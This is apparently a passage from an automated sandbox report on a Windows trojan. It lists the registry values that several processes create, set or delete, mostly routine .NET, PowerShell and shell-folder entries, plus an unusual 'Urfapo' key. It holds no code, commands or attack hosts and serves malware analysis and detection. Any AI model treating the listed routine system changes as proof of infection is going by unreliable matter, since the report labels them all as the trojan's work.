"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"Microsoft.PowerShell.ConsoleHost.resources,1.0.0.0,en,31bf3856ad364e35,MSIL" = "AE 88 8B C1 AB F3 D0 01"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "197"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "198"
"StoreChangeIDFor64BitProcesses" = "176"
"StoreChangeIDFor32BitProcesses" = "197"
The process PSCustomSetupUtil.exe:2332 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "D9 CB 5C 3C 74 35 6A 54 61 9C 64 BB C5 F2 10 23"
[HKLM\System\CurrentControlSet\Control\Session Manager\Environment]
"Path" = "C:\Perl\site\bin;C:\Perl\bin;%SystemRoot%\system32;%SystemRoot%;%SystemRoot%\System32\Wbem;c:\Program Files\Wireshark;%System%\WindowsPowerShell\v1.0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
The process PSCustomSetupUtil.exe:2556 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "37 AF 49 36 5B 22 39 C6 97 31 0F B9 8F 07 66 32"
[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"Microsoft.PowerShell.GPowerShell.resources,1.0.0.0,en,31bf3856ad364e35,MSIL" = "0C C1 C7 CB AB F3 D0 01"
[HKLM\SOFTWARE\Microsoft\Fusion\References\Microsoft.PowerShell.GPowerShell.resources, Version=1.0.0.0, Culture=en, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "209"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "210"
"StoreChangeIDFor64BitProcesses" = "188"
"StoreChangeIDFor32BitProcesses" = "209"
The process PSCustomSetupUtil.exe:2140 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "B5 10 5C DF FC B8 21 75 7A 16 45 66 D8 1A 28 0C"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"Microsoft.PowerShell.Commands.Diagnostics.resources,1.0.0.0,en,31bf3856ad364e35,MSIL" = "88 81 26 C2 AB F3 D0 01"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "201"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "202"
[HKLM\SOFTWARE\Microsoft\Fusion\References\Microsoft.PowerShell.Commands.Diagnostics.resources, Version=1.0.0.0, Culture=en, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"
[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeIDFor64BitProcesses" = "180"
"StoreChangeIDFor32BitProcesses" = "201"
The process ipconfig.exe:1240 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"Guid" = "8aefce96-4618-42ff-a057-3536aa78233e"
[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"EventMessageFile" = "%System%\ESENT.dll"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"CategoryCount" = "16"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"Active" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"Active" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"ControlFlags" = "1"
"LogSessionName" = "stdout"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"Active" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"LogSessionName" = "stdout"
"ControlFlags" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "61 15 BF 2F B5 89 86 C3 D3 97 F1 32 28 D4 48 ED"
[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"CategoryMessageFile" = "%System%\ESENT.dll"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"LogSessionName" = "stdout"
[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"TypesSupported" = "7"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"ControlFlags" = "1"
[HKCU\Software\Microsoft\Urfapo]
"Awxi" = "00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
The process yfenaromaf.exe:1664 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "D8 B5 A4 65 FC 46 B9 A5 42 20 16 46 A4 B9 81 35"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
The process PSSetupNativeUtils.exe:1932 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "00 B5 CC 46 EE 3D 80 2F 7C DD A3 03 C6 08 FA 9E"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Programs" = "%Documents and Settings%\All Users\Start Menu\Programs"
"Common Documents" = "%Documents and Settings%\All Users\Documents"
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"
"Personal" = "%Documents and Settings%\%current user%\My Documents"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"
[HKCU\Software\Microsoft\Urfapo]
"Awxi" = "00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
The process mscorsvw.exe:4008 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "37 61 5F 71 73 90 CA ED 96 E6 BA BF D5 8B 56 3D"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\LocalService\Application Data"
The process mscorsvw.exe:3128 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.BackgroundIntelligentTransfer.Management.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "3"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Management.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"RuntimeMissing" = "1"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.BackgroundIntelligentTransfer.Management.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"RuntimeMissing" = "1"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Management,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "3"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.ConsoleHost.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"RuntimeMissing" = "1"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.BackgroundIntelligentTransfer.Management,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "3"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.ConsoleHost,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "3"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.GraphicalHost.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"RuntimeMissing" = "1"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Diagnostics.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "3"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Diagnostics,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"ImageList" = "01 00 00 00 00 02 00 00 00 0A 01 00 00 4D 00 69"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Security.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"RuntimeMissing" = "1"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\System.Management.Automation.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "3"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Management,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"RuntimeVersion" = "v2.0.50727"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "0"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.GPowerShell,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"RuntimeVersion" = "v2.0.50727"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Security.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "3"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.ConsoleHost,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"RuntimeVersion" = "v2.0.50727"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Utility,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"ImageList" = "01 00 00 00 00 02 00 00 00 02 01 00 00 4D 00 69"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.WSMan.Management,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"RuntimeVersion" = "v2.0.50727"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Diagnostics,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "3"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Utility,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"RuntimeVersion" = "v2.0.50727"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.GraphicalHost,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"RuntimeVersion" = "v2.0.50727"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.GPowerShell.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"RuntimeMissing" = "1"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Editor.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "3"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Utility.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "3"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Utility,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "3"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Diagnostics.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"RuntimeMissing" = "1"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Management,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"ImageList" = "01 00 00 00 00 02 00 00 00 08 01 00 00 4D 00 69"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.WSMan.Management.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"RuntimeMissing" = "1"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.BackgroundIntelligentTransfer.Management,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"RuntimeVersion" = "v2.0.50727"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.ConsoleHost,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"ImageList" = "01 00 00 00 00 02 00 00 00 F8 00 00 00 4D 00 69"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\State]
"AccumulatedWaitIdleTime" = "0"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.GraphicalHost.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "3"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Diagnostics,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"RuntimeVersion" = "v2.0.50727"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "D3 0F 67 71 89 16 30 A7 3B 8D 48 59 6B A9 72 32"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\System.Management.Automation.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"RuntimeMissing" = "1"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Management.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "3"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.WSMan.Management.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "3"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.BackgroundIntelligentTransfer.Management,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"ImageList" = "01 00 00 00 00 02 00 00 00 1C 01 00 00 4D 00 69"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.GPowerShell.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "3"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Utility.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"RuntimeMissing" = "1"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.WSMan.Runtime,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"RuntimeVersion" = "v2.0.50727"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\System.Management.Automation,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"RuntimeVersion" = "v2.0.50727"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Security,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"RuntimeVersion" = "v2.0.50727"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Editor,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"ImageList" = "01 00 00 00 00 02 00 00 00 EE 00 00 00 4D 00 69"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.ConsoleHost.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "3"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Editor,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"RuntimeVersion" = "v2.0.50727"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Editor.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"RuntimeMissing" = "1"
The process mscorsvw.exe:2592 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7df4ed04\40209899\66\InvertDependencies\56d30baa\41c113e9]
"5d" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\56d30baa\41c113e9\5d]
"DisplayName" = "Microsoft.PowerShell.Commands.Utility,1.0.0.0,,31bf3856ad364e35"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\3fcdfaca\10\InvertDependencies\56d30baa\41c113e9]
"5d" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\1d498232\8\InvertDependencies\56d30baa\41c113e9]
"5d" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\24bf93f6\643db07b\27\InvertDependencies\56d30baa\41c113e9]
"5d" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\56d30baa\41c113e9\5d]
"ILDependencies" = "7F 93 69 55 F3 DF 09 78 61 00 00 00 01 00 00 00"
"ConfigMask" = "4361"
"MVID" = "93 92 67 97 48 6D 4F 7A 9B 69 C5 87 5F F3 FC 30"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index5d]
"NIUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF F1"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\LocalService\Application Data"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"ILUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF FF E1"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\56d30baa\41c113e9\5d]
"ConfigString" = "ZAP--0000-0000"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\291a02d0\7\InvertDependencies\30bc7c4f\1d498232]
"8" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7df4ed04\40209899\66]
"LastModTime" = "D0 21 40 C0 AB F3 D0 01"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\141dfd70\43970528\4b\InvertDependencies\56d30baa\41c113e9]
"5d" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\3c74e9a9\1\InvertDependencies\30bc7c4f\1d498232]
"8" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\5569937f\7809dff3\61\InvertDependencies\56d30baa\41c113e9]
"5d" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\3c74e9a9\1\InvertDependencies\56d30baa\41c113e9]
"5d" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\56d30baa\41c113e9\5d]
"Status" = "0"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7df4ed04\40209899\66]
"DisplayName" = "Microsoft.PowerShell.Commands.Utility,1.0.0.0,,31bf3856ad364e35"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\73843e06\30041bb6\4c\InvertDependencies\56d30baa\41c113e9]
"5d" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\56d30baa\41c113e9\5d]
"NIDependencies" = "C6 38 19 18 A9 E9 74 3C 01 00 00 00 02 00 00 00"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index5d]
"ILUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF FF E1"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\291a02d0\7\InvertDependencies\56d30baa\41c113e9]
"5d" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"NIUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF F1"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "A3 30 BD F2 F8 D4 1E F0 A9 57 F4 3B B9 53 69 DD"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7df4ed04\40209899\66]
"SIG" = "EF D0 54 19 D0 F5 86 44 A9 62 4E 86 6A 5F 6C 6E"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"LatestIndex" = "93"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7df4ed04\40209899\66]
"Status" = "4098"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "209"
The Trojan deletes the following registry key(s):
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index5b]
The process mscorsvw.exe:2732 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "2B BF 44 4A 6C FA 52 B2 10 EC 05 A2 E2 3F 31 5A"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\LocalService\Application Data"
The process mscorsvw.exe:3104 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "F9 B7 83 50 EF BF ED 23 59 86 2D 41 F4 1A 34 C4"
